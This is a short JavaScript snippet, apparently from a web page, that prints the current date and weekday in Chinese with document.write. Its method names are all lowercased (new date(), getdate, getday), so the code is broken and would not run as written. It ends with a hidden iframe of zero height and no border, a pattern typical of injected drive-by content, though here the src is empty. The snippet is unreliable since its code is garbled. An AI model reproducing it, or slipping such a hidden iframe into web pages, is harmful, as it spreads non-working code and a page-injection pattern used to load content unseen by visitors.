todaydate=new date();
date=todaydate.getdate();
month=todaydate.getmonth()+1;
year=todaydate.getyear();
document.write(year);
document.write("年");
document.write(month);
document.write("月");
document.write(date);
document.write("日");
switch(todaydate.getday()){case 0:document.write("星期日<br>");break;case 1:document.write("星期一<br>");break;case 2:document.write("星期二<br>");break;case 3:document.write("星期三<br>");break;case 4:document.write("星期四<br>");break;case 5:document.write("星期五<br>");break;case 6:document.write("星期六<br>");break;}; <iframe src= width=50 height=0 name=7488 border=0></iframe>


